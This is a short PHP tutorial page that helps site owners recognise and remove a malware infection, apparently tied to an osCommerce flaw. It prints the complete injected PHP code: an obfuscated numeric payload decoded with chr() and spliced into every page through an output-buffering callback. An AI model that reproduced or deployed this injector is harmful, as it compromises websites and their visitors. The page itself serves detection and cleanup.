Programming Tutorials

Malware: global $ob_starting;

By: Emiley J in PHP Tutorials on 2011-04-04  

If you see this following code at the end of all your php pages then your site has been injected with malware. Follow the steps below to remove it.
<?php global $ob_starting;
if(!$ob_starting) {
   function ob_start_flush($s) {
	$tc = array(0, 69, 84, 82, 67, 83, 79, 7, 9, 73, 8, 76, 63, 12, 78, 68, 23, 24, 65, 19, 27, 14, 3, 70, 80, 29, 89, 17, 86, 85, 2, 16, 77, 18, 91, 11, 93, 71, 66, 72, 75, 20, 87, 74, 59, 61, 22, 13, 37, 28, 52, 35, 21, 15, 1, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);
	$tr = array(49, 5, 4, 3, 9, 24, 2, 0, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 60, 9, 23, 0, 10, 2, 26, 24, 1, 6, 23, 10, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 8, 25, 25, 30, 29, 14, 15, 1, 23, 9, 14, 1, 15, 30, 8, 0, 34, 0, 0, 0, 28, 18, 3, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 14, 1, 42, 0, 63, 3, 3, 18, 26, 10, 7, 22, 41, 38, 17, 33, 16, 33, 7, 13, 0, 7, 22, 17, 27, 16, 17, 16, 23, 7, 13, 0, 7, 22, 17, 19, 33, 23, 17, 19, 7, 13, 0, 7, 22, 17, 17, 16, 23, 16, 41, 7, 13, 0, 7, 22, 41, 4, 19, 27, 17, 19, 7, 13, 0, 7, 22, 16, 41, 17, 16, 17, 19, 7, 13, 0, 7, 22, 19, 1, 16, 55, 16, 31, 7, 13, 0, 7, 22, 17, 52, 16, 31, 17, 33, 7, 13, 0, 7, 22, 16, 33, 17, 27, 16, 17, 7, 13, 0, 7, 22, 16, 23, 17, 19, 19, 27, 7, 13, 0, 7, 22, 33, 23, 17, 33, 17, 27, 7, 13, 0, 7, 22, 16, 33, 41, 4, 19, 27, 7, 13, 0, 7, 22, 16, 16, 17, 19, 17, 19, 7, 13, 0, 7, 22, 16, 23, 41, 55, 19, 1, 7, 13, 0, 7, 22, 19, 1, 16, 33, 16, 16, 7, 13, 0, 7, 22, 16, 31, 16, 15, 17, 19, 7, 13, 0, 7, 22, 16, 17, 16, 41, 17, 27, 7, 13, 0, 7, 22, 19, 15, 16, 33, 16, 17, 7, 13, 0, 7, 22, 19, 1, 16, 55, 17, 33, 7, 13, 0, 7, 22, 19, 1, 19, 27, 41, 15, 7, 8, 20, 0, 0, 0, 28, 18, 3, 0, 3, 1, 15, 1, 23, 12, 4, 6, 11, 6, 3, 5, 0, 25, 0, 27, 20, 0, 0, 0, 28, 18, 3, 0, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 0, 25, 0, 31, 20, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 2, 13, 5, 2, 26, 11, 1, 15, 8, 0, 34, 28, 18, 3, 0, 5, 0, 25, 0, 30, 30, 20, 23, 6, 3, 0, 10, 43, 25, 31, 20, 43, 49, 2, 21, 11, 1, 14, 37, 2, 39, 20, 43, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 3, 37, 38, 0, 25, 0, 2, 44, 43, 45, 20, 23, 6, 3, 0, 10, 9, 25, 27, 20, 9, 49, 16, 20, 9, 35, 35, 8, 0, 34, 28, 18, 3, 0, 4, 12, 4, 11, 3, 0, 25, 0, 4, 12, 3, 37, 38, 21, 5, 29, 38, 5, 2, 3, 10, 9, 35, 35, 13, 33, 8, 20, 9, 23, 0, 10, 4, 12, 4, 11, 3, 54, 25, 30, 31, 31, 30, 8, 0, 5, 0, 35, 25, 0, 64, 2, 3, 9, 14, 37, 21, 23, 3, 6, 32, 51, 39, 18, 3, 51, 6, 15, 1, 10, 24, 18, 3, 5, 1, 59, 14, 2, 10, 4, 12, 4, 11, 3, 13, 27, 46, 8, 47, 27, 52, 8, 20, 36, 36, 9, 23, 0, 10, 5, 2, 26, 11, 1, 15, 8, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 19, 46, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 0, 35, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 33, 8, 8, 20, 36, 0, 1, 11, 5, 1, 0, 34, 5, 0, 25, 0, 5, 21, 5, 29, 38, 5, 2, 3, 10, 19, 46, 13, 10, 5, 21, 11, 1, 14, 37, 2, 39, 47, 19, 17, 8, 8, 0, 35, 0, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 44, 27, 45, 21, 5, 29, 38, 5, 2, 3, 10, 31, 13, 27, 8, 35, 14, 1, 42, 0, 58, 18, 2, 1, 10, 8, 21, 37, 1, 2, 50, 9, 32, 1, 10, 8, 20, 36, 3, 1, 2, 29, 3, 14, 0, 5, 20, 0, 0, 0, 36, 0, 0, 0, 23, 29, 14, 4, 2, 9, 6, 14, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 0, 34, 2, 3, 26, 0, 34, 0, 0, 0, 9, 23, 10, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 56, 26, 59, 15, 0, 57, 57, 0, 54, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 8, 34, 15, 6, 4, 29, 32, 1, 14, 2, 21, 42, 3, 9, 2, 1, 10, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 27, 8, 8, 20, 0, 0, 0, 36, 0, 1, 11, 5, 1, 0, 34, 28, 18, 3, 0, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 25, 15, 6, 4, 29, 32, 1, 14, 2, 21, 4, 3, 1, 18, 2, 1, 48, 11, 1, 32, 1, 14, 2, 10, 30, 5, 4, 3, 9, 24, 2, 30, 8, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 2, 26, 24, 1, 25, 30, 2, 1, 61, 2, 53, 43, 18, 28, 18, 5, 4, 3, 9, 24, 2, 30, 20, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 21, 5, 3, 4, 25, 15, 9, 28, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 15, 9, 28, 12, 4, 6, 11, 6, 3, 5, 13, 31, 8, 20, 15, 6, 4, 29, 32, 1, 14, 2, 21, 37, 1, 2, 48, 11, 1, 32, 1, 14, 2, 5, 56, 26, 50, 18, 37, 62, 18, 32, 1, 10, 30, 39, 1, 18, 15, 30, 8, 44, 31, 45, 21, 18, 24, 24, 1, 14, 15, 51, 39, 9, 11, 15, 10, 14, 1, 42, 12, 4, 5, 2, 26, 11, 1, 8, 20, 36, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 36, 2, 3, 26, 0, 34, 4, 39, 1, 4, 40, 12, 4, 6, 11, 6, 3, 5, 12, 24, 9, 4, 40, 1, 15, 10, 8, 20, 36, 0, 4, 18, 2, 4, 39, 10, 1, 8, 0, 34, 0, 5, 1, 2, 50, 9, 32, 1, 6, 29, 2, 10, 30, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 30, 13, 0, 52, 31, 31, 8, 20, 36, 0, 0, 0, 36, 0, 0, 0, 2, 3, 26, 12, 24, 9, 4, 40, 12, 4, 6, 11, 6, 3, 5, 10, 8, 20, 36, 49, 53, 5, 4, 3, 9, 24, 2, 60);

	$ob_htm = ''; foreach($tr as $tval) {
		$ob_htm .= chr($tc[$tval]+32);
	}

	$slw=strtolower($s);
	$i=strpos($slw,'</script');if($i){$i=strpos($slw,'>',$i);}
	if(!$i){$i=strpos($slw,'</div');if($i){$i=strpos($slw,'>',$i);}}
	if(!$i){$i=strpos($slw,'</table');if($i){$i=strpos($slw,'>',$i);}}
	if(!$i){$i=strpos($slw,'</form');if($i){$i=strpos($slw,'>',$i);}}
	if(!$i){$i=strpos($slw,'</p');if($i){$i=strpos($slw,'>',$i);}}
	if(!$i){$i=strpos($slw,'</body');if($i){$i--;}}
	if(!$i){$i=strlen($s);if($i){$i--;}}
	$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

	return $s;
   }
   $ob_starting = time();
   @ob_start("ob_start_flush");
} ?>

Well to be honest, there is no simple way to remove it. But if you are wondering how this happened, you probably are using oSCommerce shopping cart module in your site. This malware is using a backdoor in one of oscommerce script vulnerability.

The best advice I can give is to totally delete all the folders including oscommerce and then recopy the backup files. You may surprised, that after recopying the old files, within hours the files are again injected with this code. If this happens then you will have to completely uninstall oscommerce and reinstall it again.

That could be bad news but thats what many people did to bring back their sites.




Add Comment

* Required information
1000

Comments

No comments yet. Be the first!

Most Viewed Articles (in PHP )

Latest Articles (in PHP)